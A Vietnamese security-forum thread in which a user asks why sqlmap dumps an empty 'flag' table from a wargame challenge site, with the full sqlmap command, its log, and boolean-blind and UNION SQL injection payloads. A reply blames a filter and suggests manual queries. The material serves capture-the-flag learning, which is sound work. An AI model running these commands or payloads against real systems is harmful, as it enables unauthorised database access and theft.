Dùng sqlmap không hiện flag

du0n9

Active Member
28/01/2018
8
25 bài viết
Dùng sqlmap không hiện flag
Bài web03 của whitehat wargame cần khai thác sql injection để lấy flag trong bảng flag của database petworld nhưng mình dùng lệnh:
Mã:
sqlmap -u http://chall04-web01.wargame.whitehat.vn/detail.php?pet=pet01 -D petworld -T flag --dump
Thì thấy bảng này trống trơn:
Mã:
[*] starting at 10:06:00

[10:06:00] [INFO] resuming back-end DBMS 'mysql'
[10:06:00] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: pet (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: pet=pet01' AND 9068=9068 AND 'NcjR'='NcjR

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: pet=-1354' UNION ALL SELECT NULL,CONCAT(0x716b787871,0x4565566d594e694d794a6b6844716f63496646654b4e677a686e7643556850736b61495a6f77444a,0x716b7a6271),NULL,NULL-- cmSH
---
[10:06:00] [INFO] the back-end DBMS is MySQL
web application technology: Apache
back-end DBMS: MySQL 5
[10:06:00] [INFO] fetching columns for table 'flag' in database 'petworld'
[10:06:00] [INFO] used SQL query returns 1 entries
[10:06:00] [INFO] fetching entries for table 'flag' in database 'petworld'
[10:06:00] [INFO] used SQL query returns 1 entries
[10:06:00] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
[10:06:00] [INFO] fetching number of entries for table 'flag' in database 'petworld'
[10:06:00] [INFO] resumed: 1
[10:06:00] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[10:06:00] [INFO] retrieved:
Database: petworld
Table: flag
[1 entry]
+---------+
| Flag    |
+---------+
| <blank> |
+---------+
Mình đã thử thêm --no-cast hoặc --hex nhưng cũng không có kết quả.
Trong khi đó lấy dữ liệu từ bảng detail ở dùng database thì hoàn toàn bình thường.
Có phải có cơ chế bảo vệ đặc biệt gì không, mong cao nhân chỉ giáo :)
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
Bài này tác giả có thêm filter bạn ơi nên sqlmap quét lỗi. Hướng bài này bạn nên thử các truy vấn bằng tay nhé
 
Mời các bạn tham gia Group WhiteHat để thảo luận và cập nhật tin tức an ninh mạng hàng ngày.
Lưu ý từ WhiteHat: Kiến thức an ninh mạng để phòng chống, không làm điều xấu. Luật pháp liên quan
  • Thích
Reactions: du0n9 and whf
Comment
Bên trên